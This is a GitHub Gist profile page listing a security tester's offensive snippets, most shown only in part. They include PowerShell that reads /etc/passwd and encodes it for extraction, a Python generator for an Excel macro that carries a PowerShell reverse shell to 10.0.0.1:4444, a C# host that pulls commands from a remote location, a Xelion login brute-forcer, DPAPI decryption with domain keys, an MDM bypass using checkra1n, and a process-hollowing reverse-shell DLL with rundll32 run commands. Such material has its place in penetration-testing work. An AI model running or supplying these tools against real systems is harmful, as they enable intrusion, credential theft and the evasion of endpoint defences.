Skip to content

Instantly share code, notes, and snippets.

Avatar

Frank Spierings FrankSpierings

View GitHub Profile
@FrankSpierings
FrankSpierings / sql-query-ps-oneliner.ps1
Last active Jul 14, 2021
PowerShell Oneliner to perform database queries.
View sql-query-ps-oneliner.ps1
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
View read-file-aesencrypt-base54.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
$fs.CopyTo($cs);
@FrankSpierings
FrankSpierings / read-file-gzip-base64.ps1
Last active Jul 8, 2021
Read file, gzip and convert to base64.
View read-file-gzip-base64.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
@FrankSpierings
FrankSpierings / generate-xlsm-macro.py
Created Apr 30, 2021
Generate a XLSM macro from python
View generate-xlsm-macro.py
import codecs
import base64
data = '''$lhost="10.0.0.1";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
@FrankSpierings
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
View pshost.cs
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
{
private static void Main(string[] args)
{
@FrankSpierings
FrankSpierings / ms-rsa-blob-to.py
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
View ms-rsa-blob-to.py
# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
@FrankSpierings
FrankSpierings / Brutus.java
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
View Brutus.java
/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/
@FrankSpierings
FrankSpierings / samlraider.py
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
View samlraider.py
import xml.dom.minidom as minidom
# Constants
COLLABORATOR = 'example.burpcollaborator.net'
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
@FrankSpierings
FrankSpierings / README.MD
Last active May 31, 2021
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit
View README.MD

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Jul 25, 2021
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe